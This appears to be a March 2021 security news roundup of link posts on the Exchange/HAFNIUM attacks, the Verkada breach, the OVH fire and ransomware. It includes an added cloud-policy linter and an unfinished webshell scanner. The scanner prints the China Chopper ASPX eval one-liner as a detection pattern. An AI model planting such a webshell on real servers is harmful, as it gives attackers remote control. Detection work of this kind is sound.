This posting is here to collect cyber security news in March 2021.
I post links to security vulnerability news in the comments of this article.
You are also free to post related links in the comments.
342 Comments
Tomi Engdahl says:
Supermicro, Pulse Secure Respond to Trickbot’s Ability to Target Firmware
https://www.securityweek.com/supermicro-pulse-secure-respond-trickbots-ability-target-firmware
Server and storage technology giant Supermicro and secure access solutions provider Pulse Secure have issued advisories to inform users that some of their products are vulnerable to the Trickbot malware’s ability to target firmware.
Tomi Engdahl says:
Thousands of Mobile Apps Expose Data via Misconfigured Cloud Containers
https://www.securityweek.com/thousands-mobile-apps-expose-data-misconfigured-cloud-containers
Thousands of mobile applications expose user data through insecurely implemented cloud containers, according to a new report from security vendor Zimperium.
The issue, the company notes, is rooted in the fact that many developers tend to overlook the security of cloud containers during the development process.
Cloud services help resolve the issue of storage space on mobile devices, and developers have numerous such solutions to choose from, some of the most popular being Amazon Web Services, Microsoft’s Azure, Google Storage, and Firebase, among others.
“All of these services allow you to easily store data and make it accessible to your apps. But, herein lies the risk, the ease of use of these services also makes it easy for the developer to misconfigure access policies, potentially allowing anyone to access and in some cases even alter data,” Zimperium notes.
Unsecured Cloud Configurations Exposing Information in Thousands of Mobile Apps
https://blog.zimperium.com/unsecured-cloud-configurations-exposing-information-in-thousands-of-mobile-apps/
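The report above boils down to a storage access policy that grants anonymous principals read or write access. The following is an added example written for this page, not code from Zimperium or from the original post: a small offline linter for two of the policy shapes named in the article, an AWS S3 bucket policy and a Firebase Realtime Database rules document. Both sample documents, the bucket name `example-app-uploads`, the role ARN and the VPC endpoint id are constructed for the example.

```python
"""Lint cloud storage access policies for grants to anonymous callers.

Added example for this page; not part of Zimperium's report or the
original post. The two sample documents below are constructed.
"""
import json

# Actions that let an anonymous caller read, respectively modify, objects.
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:*", "*"}
WRITE_ACTIONS = {"s3:putobject", "s3:deleteobject", "s3:*", "*"}


def _as_list(value):
    """IAM lets most fields be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_anonymous(principal):
    """"*" or {"AWS": "*"} (possibly inside a list) means any caller, signed or not."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return False


def find_public_grants(policy):
    """Return (Sid, kind) for each Allow statement whose principal is anonymous.

    kind is "read" or "write"; a statement that carries a Condition block is
    reported as "conditional-read"/"conditional-write" so a reviewer can check
    whether the condition really narrows the grant. NotPrincipal/NotAction
    forms are not handled here.
    """
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_anonymous(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if actions & WRITE_ACTIONS:
            kind = "write"
        elif actions & READ_ACTIONS:
            kind = "read"
        else:
            continue
        if stmt.get("Condition"):
            kind = "conditional-" + kind
        findings.append((stmt.get("Sid", f"Statement[{idx}]"), kind))
    return findings


def find_open_firebase_rules(rules, path=""):
    """Walk a Realtime Database rules document and return (path, rule) pairs
    where ".read" or ".write" is the literal true, i.e. no auth check at all.
    Rule expressions such as "auth != null" are left alone."""
    findings = []
    node = rules.get("rules", rules) if path == "" else rules
    for key, value in node.items():
        if key in (".read", ".write"):
            literal_true = value is True or (
                isinstance(value, str) and value.strip().lower() == "true")
            if literal_true:
                findings.append((path or "/", key))
        elif isinstance(value, dict):
            findings.extend(find_open_firebase_rules(value, f"{path}/{key}"))
    return findings


# Constructed sample: one scoped grant, one public read, one public write
# that is narrowed by a VPC-endpoint condition.
SAMPLE_BUCKET_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AppReadOnly", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/example-app-role"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-app-uploads/*"},
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::example-app-uploads",
                  "arn:aws:s3:::example-app-uploads/*"]},
    {"Sid": "PublicWriteFromVpc", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:PutObject", "Resource": "arn:aws:s3:::example-app-uploads/*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-EXAMPLE"}}}
  ]
}
""")

# Constructed sample Firebase rules: "users" requires auth, two nodes do not.
SAMPLE_FIREBASE_RULES = {
    "rules": {
        "users": {".read": "auth != null", ".write": "auth != null",
                  "$uid": {".write": "$uid === auth.uid"}},
        "public_catalog": {".read": True},
        "uploads": {".read": "true", ".write": True},
    }
}

if __name__ == "__main__":
    for sid, kind in find_public_grants(SAMPLE_BUCKET_POLICY):
        print(f"S3 policy: statement {sid} grants anonymous {kind}")
    for path, rule in find_open_firebase_rules(SAMPLE_FIREBASE_RULES):
        print(f"Firebase rules: {path} has {rule} open to everyone")
```

Run over a real bucket policy (`aws s3api get-bucket-policy` output) or an exported rules file, an "anonymous write" finding is the case the report describes as data that anyone can alter; "conditional" findings still deserve a look, since a condition on a source VPC endpoint scopes the grant but a condition on, say, a user agent does not.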
Tomi Engdahl says:
Microsoft Shares Additional Mitigations for Exchange Server Vulnerabilities Under Attack
https://www.securityweek.com/microsoft-shares-additional-mitigations-exchange-server-vulnerabilities-under-attack
Tomi Engdahl says:
https://www.securityweek.com/cybersecurity-ma-roundup-week-mar-1-2021
Tomi Engdahl says:
Casting a Wide Intrusion Net: Dozens Burned With Single Hack
https://www.securityweek.com/casting-wide-intrusion-net-dozens-burned-single-hack
The SolarWinds hacking campaign blamed on Russian spies and the “grave threat” it poses to U.S. national security are widely known. A very different — and no less alarming — coordinated series of intrusions also detected in December has gotten considerably less public attention.
Nimble, highly skilled criminal hackers believed to operate out of Eastern Europe hacked dozens of companies and government agencies on at least four continents by breaking into a single product they all used.
The victims include New Zealand’s central bank, Harvard Business School, Australia’s securities regulator, the high-powered U.S. law firm Jones Day — whose clients include former President Donald Trump — the rail freight company CSX and the Kroger supermarket and pharmacy chain. Also hit was Washington state’s auditor’s office, where the personal data of up to 1.3 million people gathered for an investigation into unemployment fraud was potentially exposed.
Tomi Engdahl says:
F1 Team Williams Unveils New Car After Hackers Foil Launch
https://www.securityweek.com/f1-team-williams-unveils-new-car-after-hackers-foil-launch
The Williams team presented its new Formula One car on Friday — after hackers foiled plans for an “augmented reality” launch — revealing a livery inspired by its “all-conquering cars of the 1980s and 1990s.”
The British team enters its first full season under the ownership of US-based investment firm Dorilton Capital.
The FW43B car has “a dramatic new visual identity sporting a livery inspired by Williams’ all-conquering cars of the 1980s and 1990s, combining blue, white and yellow accents.”
Williams had planned to reveal the car via an augmented reality app but scrapped it “because the app was hacked prior to launch.”
Tomi Engdahl says:
European Banking Authority discloses Exchange server hack
https://www.bleepingcomputer.com/news/security/european-banking-authority-discloses-exchange-server-hack/
Tomi Engdahl says:
Gab, a haven for pro-Trump conspiracy theories, has been hacked again
A failure to purge authentication tokens taken in the first breach leads to a second one.
https://arstechnica.com/information-technology/2021/03/gab-a-haven-for-pro-trump-conspiracy-theories-has-been-hacked-again/
Tomi Engdahl says:
William Turton / Bloomberg:
Hackers say they breached Verkada, accessing feeds and archives of 150K surveillance cameras inside clinics, police precincts, jails, schools, Tesla facilities — Hacker group says it wanted to show prevalence of surveillance — Video footage was captured from Sequoia-backed startup Verkada
Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals
https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams
Hacker group says it wanted to show prevalence of surveillance
Video footage was captured from Sequoia-backed startup Verkada
A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools.
Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside women’s health clinics, psychiatric hospitals and the offices of Verkada itself. Some of the cameras, including in hospitals, use facial-recognition technology to identify and categorize people captured on the footage. The hackers say they also have access to the full video archive of all Verkada customers.
In a video seen by Bloomberg, a Verkada camera inside Florida hospital Halifax Health showed what appeared to be eight hospital staffers tackling a man and pinning him to a bed. Halifax Health is featured on Verkada’s public-facing website in a case study entitled: “How a Florida Healthcare Provider Easily Updated and Deployed a Scalable HIPAA Compliant Security System.”
Another video, shot inside a Tesla warehouse in Shanghai, shows workers on an assembly line. The hackers said they obtained access to 222 cameras in Tesla factories and warehouses.
The data breach was carried out by an international hacker collective and intended to show the pervasiveness of video surveillance and the ease with which systems could be broken into.
Kottmann said their reasons for hacking are “lots of curiosity, fighting for freedom of information and against intellectual property, a huge dose of anti-capitalism, a hint of anarchism — and it’s also just too much fun not to do it.”
“We have disabled all internal administrator accounts to prevent any unauthorized access,” a Verkada spokesperson said in a statement. “Our internal security team and external security firm are investigating the scale and scope of this issue, and we have notified law enforcement.”
A person with knowledge of the matter said Verkada’s chief information security officer, an internal team and an external security firm are investigating the incident. The company is working to notify customers and set up a support line to address questions, said the person, who requested anonymity to discuss an ongoing investigation.
“This afternoon we were alerted that the Verkada security camera system that monitors main entry points and main thoroughfares in a handful of Cloudflare offices may have been compromised,” San Francisco-based Cloudflare said in a statement. “The cameras were located in a handful of offices that have been officially closed for several months.” The company said it disabled the cameras and disconnected them from office networks.
The hackers say they were able to access live feeds and archived video, in some cases including audio, of interviews between police officers and criminal suspects, all in the high-definition resolution known as 4K.
Kottmann said their group was able to obtain “root” access on the cameras, meaning they could use the cameras to execute their own code. That access could, in some instances, allow them to pivot and obtain access to the broader corporate network of Verkada’s customers, or hijack the cameras and use them as a platform to launch future hacks. Obtaining this degree of access to the camera didn’t require any additional hacking, as it was a built-in feature, Kottmann said.
The hackers’ methods were unsophisticated: they gained access to Verkada through a “Super Admin” account, allowing them to peer into the cameras of all of its customers. Kottmann says they found a user name and password for an administrator account publicly exposed on the internet. After Bloomberg contacted Verkada, the hackers lost access to the video feeds and archives, Kottmann said.
Tomi Engdahl says:
Kelly Sheridan / Dark Reading:
Linux Foundation debuts the Sigstore initiative, which aims to improve open source software supply chain security, and includes members like Google and Red Hat
https://www.darkreading.com/application-security/linux-foundation-debuts-sigstore-project-for-software-signing/d/d-id/1340360
Tomi Engdahl says:
FireEye CEO: Reckless Microsoft Hack Unusual for China
https://www.securityweek.com/fireeye-ceo-reckless-microsoft-hack-unusual-china
Cyber sleuths have already blamed China for a hack that exposed tens of thousands of servers running its Exchange email program to potential hacks. The CEO of a prominent cybersecurity firm says it now seems clear China also unleashed an indiscriminate, automated second wave of hacking that opened the way for ransomware and other cyberattacks.
The second wave, which began Feb. 26, is highly uncharacteristic of Beijing’s elite cyber spies and far exceeds the norms of espionage, said Kevin Mandia of FireEye. In its massive scale it diverges radically from the highly targeted nature of the original hack, which was detected in January.
“You never want to see a modern nation like China that has an offense capability — that they usually control with discipline — suddenly hit potentially a hundred thousand systems,” Mandia said Tuesday in an interview with The Associated Press.
Tomi Engdahl says:
Microsoft Ships Massive Security Patch Bundle
https://www.securityweek.com/microsoft-ships-massive-security-patch-bundle
It’s raining patches in the Microsoft Windows ecosystem.
The Redmond, Wash. software giant on Tuesday dropped a mega-batch of security updates with patches for a whopping 89 documented vulnerabilities, including one used in zero-day attacks against some in the white-hat hacker community.
This month’s Patch Tuesday whopper comes just one week after Microsoft scrambled out emergency fixes to provide cover for in-the-wild nation-state attacks targeting Exchange Server installations.
Microsoft has blamed those attacks on Chinese cyber-espionage actors operating from leased VPS (virtual private servers) in the United States. The APT group has hit tens of thousands of organizations around the world, including targeted sectors like defense contractors, policy think tanks, and NGOs.
Tomi Engdahl says:
Third French Hospital Hit by Cyberattack
https://www.securityweek.com/third-french-hospital-hit-cyberattack
A hospital in southwest France has seen some of its IT systems paralysed by a “ransomware” cyberattack, its management said Tuesday, the third such incident in the last month.
The 320-bed facility in Oloron-Sainte-Marie near the Pyrenees mountains was hit by the attack on Monday, with screens displaying a demand in English for $50,000 in Bitcoin.
Hospital workers have had to revert to working with pens and paper, since digital patient records are not available.
The management system, used to monitor medicine stocks and other supplies, has also been affected at a time when the hospital is taking part in vaccination efforts against Covid-19.
“We might get our systems back in 48 hours or in three months,” hospital director Frederic Lecenne told local newspaper La Republique des Pyrenees.
Tomi Engdahl says:
Apple Patches Remote Code Execution Bug in WebKit
https://www.securityweek.com/apple-patches-remote-code-execution-bug-webkit
Apple on Monday released patches for a vulnerability in WebKit that could allow attackers to execute code remotely on affected devices.
Tracked as CVE-2021-1844 and co-reported by Clément Lecigne of Google’s Threat Analysis Group and Alison Huffman of Microsoft Browser Vulnerability Research, the flaw was addressed with software updates for macOS, iOS, watchOS, and Safari.
To exploit the vulnerability, an attacker would simply need to craft a webpage containing malicious code, and then lure the victim into accessing that webpage, which would trigger the execution of code on the victim’s machine.
Tomi Engdahl says:
Vulnerability That Allows Complete WordPress Site Takeover Exploited in the Wild
https://www.securityweek.com/vulnerability-allows-complete-wordpress-site-takeover-exploited-wild
A critical vulnerability identified in The Plus Addons for Elementor WordPress plugin could be exploited to gain administrative privileges to a website. The zero-day has been exploited in the wild, the Wordfence team at WordPress security company Defiant warns.
With more than 30,000 installations to date, The Plus Addons for Elementor is a premium plugin that has been designed to add several widgets to be used with the popular WordPress website builder Elementor.
The identified issue, Wordfence explains, resides in one of the added widgets, which provides the ability to insert user login and registration forms to Elementor pages.
Because the functionality is not properly configured, an attacker can create a new administrative user account on the vulnerable site, or even log in as an existing administrative user, the researchers reveal.
Tomi Engdahl says:
Siemens Releases Several Advisories for Vulnerabilities in Third-Party Components
https://www.securityweek.com/siemens-releases-several-advisories-vulnerabilities-third-party-components
Siemens on Tuesday published 12 new security advisories to inform customers about nearly two dozen vulnerabilities affecting its products.
Half of the new advisories cover vulnerabilities in third-party components. One of these advisories is related to AMNESIA:33, a collection of vulnerabilities discovered recently in open source TCP/IP stacks. Siemens has been publishing advisories to describe the impact of these flaws on its products, and the latest advisory focuses on the impact of two AMNESIA:33 denial-of-service (DoS) flaws on SENTRON 3VA and PAC Meter products.
Two advisories are related to NUMBER:JACK, a set of TCP/IP stack vulnerabilities that were discovered even more recently. The advisories describe the impact of some NUMBER:JACK issues, ones that allow session hijacking, on the SIMATIC MV400 optical readers and PLUSCONTROL products used in the energy sector.
Siemens also informed customers that its SIMATIC NET CM 1542-1 and SCALANCE SC600 devices are affected by a DoS vulnerability that exists in libcurl, a multiprotocol file transfer library.
Tomi Engdahl says:
GitHub Informs Users of ‘Potentially Serious’ Authentication Bug
https://www.securityweek.com/github-informs-users-potentially-serious-authentication-bug
GitHub on Monday informed users that it had discovered what it described as an “extremely rare, but potentially serious” security bug related to how some authenticated sessions were handled.
The Microsoft-owned software development platform said the issue was discovered on March 2 and an initial patch was rolled out on March 5. A second patch was released on March 8 and on the evening of the same day the company decided to invalidate all authenticated sessions to completely eliminate the possibility of exploitation.
The vulnerability, which GitHub said existed at various times between February 8 and March 5, was caused by a race condition that in extremely rare circumstances resulted in a user’s session being routed to the browser of a different authenticated user, providing this second user with a valid and authenticated session cookie for the first user’s account.
“It is important to note that this issue was not the result of compromised account passwords, SSH keys, or personal access tokens (PATs) and there is no evidence to suggest that this was the result of a compromise of any other GitHub systems,” noted Mike Hanley, GitHub’s recently appointed chief security officer. “Instead, this issue was due to the rare and isolated improper handling of authenticated sessions. Further, this issue could not be intentionally triggered or directed by a malicious user.”
Tomi Engdahl says:
Flaws in Apple Location Tracking System Could Lead to User Identification
https://www.securityweek.com/flaws-apple-location-tracking-system-could-lead-user-identification
Vulnerabilities identified in offline finding (OF) — Apple’s proprietary crowd-sourced location tracking system — could be abused for user identification, researchers said in a report released this month.
Tomi Engdahl says:
Dangerous Malware Dropper Found in 9 Utility Apps on Google’s Play Store
https://blog.checkpoint.com/2021/03/09/dangerous-malware-dropper-found-in-9-utility-apps-on-googles-play-store/
Check Point Research (CPR) recently discovered a new dropper spreading via the Google Play store. The dropper, dubbed Clast82, has the ability to avoid detection by Google Play Protect, complete the evaluation period successfully, and change the payload dropped from a non-malicious payload to the AlienBot Banker and MRAT. The AlienBot malware family is a Malware-as-a-Service (MaaS) for Android devices that allows a remote attacker to inject malicious code into legitimate financial applications.
https://etn.fi/index.php/13-news/11861-google-playsta-loytyi-vakava-dropper-haittaohjelma
Tomi Engdahl says:
Fortinet Addresses Latest Microsoft Exchange Server Exploits
https://www.fortinet.com/blog/threat-research/fortinet-addresses-latest-microsoft-exchange-server-exploits
As many as 30,000 businesses and government agencies across the US have been targeted by an aggressive hacking campaign that exploits vulnerabilities in versions of Microsoft Exchange Server, with some experts claiming that hundreds of thousands of Exchange Servers have been exploited worldwide. Microsoft is attributing these exploits to a cyber espionage organization known as HAFNIUM, operating out of mainland China. Microsoft Exchange Server is used by millions of organizations for email and calendar, as well as a collaboration solution.
Serious Security: Webshells explained in the aftermath of HAFNIUM attacks
https://nakedsecurity.sophos.com/2021/03/09/serious-security-webshells-explained-in-the-aftermath-of-hafnium-attacks/
The cybersecurity meganews of the week, of course, is anything to do with HAFNIUM. (To be clear, we’re going to write it as Hafnium from now on, as Microsoft does in its top-level incident disclosure document, so that it doesn’t look as though we’re shouting all the time.) Strictly speaking, Hafnium is the name that Microsoft uses to denote a specific gang of cybercriminals, allegedly operating out of China via cloud services in the US.
Tomi Engdahl says:
Threat Alert: z0Miner Is Spreading quickly by Exploiting ElasticSearch and Jenkins Vulnerabilities
https://blog.netlab.360.com/threat-alert-z0miner-is-spreading-quickly-by-exploiting-elasticsearch-and-jenkins-vulnerabilities/
In recent months, with the huge rise of Bitcoin and Monero, various mining botnets have kicked into high gear, and our BotMon system detects dozens of mining botnet attacks pretty much every day. Most of them are old families, some just changed their wallets or propagation methods, and z0Miner is one of them. z0Miner is a malicious mining family that became active last year and has been publicly analyzed by the Tencent Security Team. z0Miner was initially active when it exploited the Weblogic unauthorized remote command execution vulnerability for propagation.
Tomi Engdahl says:
Remediating Microsoft Exchange Vulnerabilities
https://us-cert.cisa.gov/remediating-microsoft-exchange-vulnerabilities
On March 2, 2021, Microsoft released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server products. On March 3, after CISA and partners observed active exploitation of vulnerabilities, CISA issued Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities and Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities.
Tomi Engdahl says:
SUPERNOVA Web Shell Deployment Linked to SPIRAL Threat Group
https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group
In late 2020, Secureworks® Counter Threat Unit (CTU) researchers observed a threat actor exploiting an internet-facing SolarWinds server to deploy the SUPERNOVA web shell. Additional analysis revealed similarities to intrusion activity identified on the same network earlier in 2020, suggesting the two intrusions are linked. CTU researchers attribute the intrusions to the SPIRAL threat group. Characteristics of the activity suggest the group is based in China.
Tomi Engdahl says:
Chinese spies struck Finland: one common factor in the series of data breaches
https://www.is.fi/digitoday/tietoturva/art-2000007849827.html
The consequences in Finland of the global attack on Microsoft Exchange email servers are gradually becoming clear. The National Cyber Security Centre, which operates under the Finnish Transport and Communications Agency Traficom, issued a rare red alert about the attack. In its alert the centre stressed very bluntly that if an organization has used or is using an Exchange server, it should assume by default that a breach has very likely taken place.
Tomi Engdahl says:
Teens are being courted to become white-hat hackers: campaign begins
https://www.tivi.fi/uutiset/tv/35f162e5-b47e-41da-90e5-331a72d767e5
In the Generation Z Hack challenge that has just started, young people are encouraged to join a white-hat challenge campaign in which they get to develop hacking skills in a safe environment. The challenge is aimed at hackers aged 13 to 18. Registration does not use strong authentication, however, so in principle anyone can join if they want. Older participants, though, need not hold out hope of receiving rewards.
Tomi Engdahl says:
European Banking Authority restores email service in wake of Microsoft Exchange hack
https://www.theregister.com/2021/03/09/eba_exchange_breach/
The European Banking Authority (EBA) has confirmed it is another victim on the list of organisations affected by vulnerabilities in Microsoft Exchange. The EBA hurriedly pulled its email servers offline over the weekend as it realised that it was among the ranks of those hit by flaws in Microsoft Exchange being targeted by miscreants. While worries about personal data held in emails were a factor in the move, by Monday the authority was feeling confident that the data leaks stopped with its email servers and that no additional information extraction had occurred.
Microsoft Exchange Server Attack Escalation Prompts Patching Panic
https://www.darkreading.com/attacks-breaches/microsoft-exchange-server-attack-escalation-prompts-patching-panic/d/d-id/1340349
US government officials weigh in on the attacks and malicious activity, which researchers believe may be the work of multiple groups. The critical Exchange Server vulnerabilities patched last week by Microsoft are being weaponized in widespread attacks against organizations worldwide. Attacks have escalated over the past two weeks, prompting responses from US government and the security community.
Tomi Engdahl says:
A ‘Blockchain Bandit’ Is Guessing Private Keys and Scoring Millions
The larger lesson of an ongoing Ethereum crime spree: Be careful about who’s generating your cryptocurrency keys.
https://www.wired.com/story/blockchain-bandit-ethereum-weak-private-keys/
“You have a thief here that amassed this fortune and then lost it all when the market crashed.”
ADRIAN BEDNAREK, INDEPENDENT SECURITY EVALUATORS
Tomi Engdahl says:
Russia says it’s restricting use of Twitter over failure to remove banned content
https://www.reuters.com/article/idUSR4N2KN028
Tomi Engdahl says:
Europe’s biggest datacenter burning like hell.
https://www.facebook.com/groups/majordomo/permalink/10161647383249522/
https://mobile.twitter.com/xgarreau/status/1369559995491172354
Tomi Engdahl says:
OVH Data Center Fire Darkens Popular Sites Worldwide
Fire at an OVH Data Center in Europe takes down thousands of sites, including WP Rocket and Imagify
https://www.searchenginejournal.com/ovh-data-center-fire-darkens-thousands-of-sites-worldwide/398485/
OVH Datacenter in France was engulfed in flames, taking down thousands of sites and businesses including popular plugins WP Rocket and Imagify. A multitude of businesses are tweeting updates to their clients.
OVH issued a status announcement on their cloud server support page:
“We are currently facing a major incident in our DataCenter of Strasbourg with a fire declared in the building SBG2.
Firefighters were immediately on the scene but could not control the fire in SBG2.
The whole site has been isolated, which impacts all our services on SBG1, SBG2, SBG3 and SBG4. If your production is in Strasbourg, we recommend to activate your Disaster Recovery Plan.
Tomi Engdahl says:
“Fire is over. Firefighters continue to cool the buildings with the water.
We don’t have the access to the site. That is why SBG1, SBG3, SBG4 won’t be restarted today.”
https://www.searchenginejournal.com/ovh-data-center-fire-darkens-thousands-of-sites-worldwide/398485/
Tomi Engdahl says:
Fire destroys OVHCloud’s SBG2 data center in Strasbourg
SBG1 also badly damaged, SBG3 and SBG4 are safe but won’t restart today
https://www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/
OVHcloud’s SBG2 data center in Strasbourg has been destroyed by a fire which also damaged SBG1. No one was hurt in the fire, but all four data centers on the site will be closed today.
The fire broke out just after midnight, on Wednesday morning, and took six hours to bring under control, with more than 100 firefighters at the scene. The five-story, 500 sq m SBG2 data center was destroyed, while SBG1 was seriously damaged. SBG3 and SBG4 were protected by the firefighters. The site is currently off-limits on Wednesday morning, and none of the data centers on the site will restart today.
The fire spread to two other buildings, damaging one other data center on the site. “A part of SBG1 is destroyed,”
OVHcloud had three staff on site, all of whom are unharmed.
A Franco-German pump boat, Europa 1, carrying a German crew, helped put out the fire, taking water directly from the Rhine.
The fire came just two days after OVHcloud announced it is taking the first steps toward an IPO, floating on the Paris stock market according to Reuters.
Tomi Engdahl says:
Supernova malware clues link Chinese threat group Spiral to SolarWinds server hacks
Updated: SolarWinds servers are being exploited to deploy the malicious .NET web shell.
https://www.zdnet.com/article/supernova-malware-clues-link-chinese-threat-group-spiral-to-solarwinds-hacks/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook
Tomi Engdahl says:
Warning the World of a Ticking Time Bomb
https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/
On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups. Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as Stage 2, when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.
Tomi Engdahl says:
Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals
https://www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams
A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools. Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside women’s health clinics, psychiatric hospitals and the offices of Verkada itself.
Tomi Engdahl says:
OVH cloud datacenter destroyed by fire
https://blog.malwarebytes.com/malwarebytes-news/2021/03/ovh-cloud-datacenter-destroyed-by-fire/
A fire in one of the OVH datacenters has destroyed one datacenter and knocked two others offline. It took 100 firefighters and 43 fire trucks to fight the fire in the five-story building. Even though the fire department was quick to respond, and the fire was brought under control relatively quickly, the impact has been big. In a press statement OVH promised to “communicate as transparently as possible on the progress of our analyses and the implementation of solutions.”
Also:
https://www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/
https://www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/
Tomi Engdahl says:
Exchange servers under siege from at least 10 APT groups
https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/
ESET Research has found LuckyMouse, Tick, Winnti Group, and Calypso, among others, are likely using the recent Microsoft Exchange vulnerabilities to compromise email servers all around the world. On 2021-03-02, Microsoft released out-of-band patches for Microsoft Exchange Server 2013, 2016 and 2019. These security updates fixed a pre-authentication remote code execution (RCE) vulnerability chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows an attacker to take over any reachable Exchange server, without even knowing any valid account credentials. We have already detected webshells on more than 5,000 email servers as of the time of writing, and according to public sources, several important organizations, such as the European Banking Authority, suffered from this attack.
Tomi Engdahl says:
Ryuk ransomware hits 700 Spanish government labor agency offices
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-hits-700-spanish-government-labor-agency-offices/
The systems of SEPE, the Spanish government agency for labor, were taken down following a ransomware attack that hit more than 700 agency offices across Spain. “Currently, work is being done with the objective of restoring priority services as soon as possible, among which is the portal of the State Public Employment Service and then gradually other services to citizens, companies, benefit and employment offices,” an announcement on the agency’s website reads.
Tomi Engdahl says:
FBI-CISA Joint Advisory on Compromise of Microsoft Exchange Server
https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server
CISA and the Federal Bureau of Investigation (FBI) have released a
Joint Cybersecurity Advisory (CSA) to address recently disclosed
vulnerabilities in Microsoft Exchange Server. CISA and FBI assess that
adversaries could exploit these vulnerabilities to compromise
networks, steal information, encrypt data for ransom, or even execute
a destructive attack.
Tomi Engdahl says:
Serious vulnerability in Windows' default browsers, update immediately
https://www.tivi.fi/uutiset/tv/61267ef1-7e3d-4ec9-ba30-f37f32df14cb
The Finnish National Cyber Security Centre (Kyberturvallisuuskeskus)
reports a vulnerability found in the Internet Explorer and Edge
browsers that can lead to memory corruption. The browsers are the
default browsers of the Windows operating system. The vulnerability
allows attackers to run arbitrary commands on the user's machine and
obtain confidential information. In its March 2021 update rollup,
Microsoft released fixes for the Edge and Internet Explorer browsers
(versions 9 and 11) that patch the vulnerability. Also:
https://arstechnica.com/gadgets/2021/03/microsoft-patches-critical-0day-that-north-korea-used-to-target-researchers/
Tomi Engdahl says:
Guidance on Remediating Networks Affected by the SolarWinds and Active
Directory/M365 Compromise
https://us-cert.cisa.gov/ncas/current-activity/2021/03/09/guidance-remediating-networks-affected-solarwinds-and-active
Since December 2020, CISA has been responding to a significant
cybersecurity incident involving an advanced persistent threat (APT)
actor targeting networks of multiple U.S. government agencies,
critical infrastructure entities, and private sector organizations.
The APT actor added malicious code to multiple versions of the
SolarWinds Orion platform and leveraged it, as well as other
techniques, for initial access to enterprise networks. After gaining
persistent, invasive access to select organizations' enterprise
networks, the APT actor targeted their federated identity solutions
and their Active Directory/M365 environments.
Tomi Engdahl says:
Cyberattackers Exploiting Critical WordPress Plugin Bug
https://threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/
The security hole in the Plus Addons for Elementor plugin was used in
active zero-day attacks prior to a patch being issued. The Plus Addons
for Elementor plugin for WordPress has a critical security
vulnerability that attackers can exploit to quickly, easily and
remotely take over a website. First reported as a zero-day bug,
researchers said it's being actively attacked in the wild. The plugin,
which has more than 30,000 active installations according to its
developer, allows site owners to create various user-facing widgets
for their websites, including user logins and registration forms that
can be added to an Elementor page. Elementor is a site-building tool
for WordPress.
Tomi Engdahl says:
Analyzing Attacks Against Microsoft Exchange Server With China Chopper
Webshells
https://unit42.paloaltonetworks.com/china-chopper-webshell/
Microsoft recently released patches for a number of zero-day Microsoft
Exchange Server vulnerabilities that are actively being exploited in
the wild by HAFNIUM, a suspected state-sponsored group operating out
of China. We provide an overview of the China Chopper webshell, a
backdoor which has been observed being dropped in these attacks. We
also analyze incidental artifacts, such as metadata, created by the
attacks themselves, which allow us to collect information and better
understand the nature and methodology of the attackers.
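The Unit 42 write-up above concerns the China Chopper webshell dropped on compromised Exchange servers. As an added illustration (this is not code from Unit 42 or from the original post), the snippet below shows a defender-side file scan for the widely published one-line form of the ASPX China Chopper server side, `<%eval(Request.Item["..."],"unsafe");%>`. The directory tree, file names and the `demo_pw` parameter name are constructed for the example; real samples vary, so treat the regex as a starting point for a hunt, not a complete signature.

```python
import re
import tempfile
from pathlib import Path

# Matches the classic one-line China Chopper ASPX server side, e.g.
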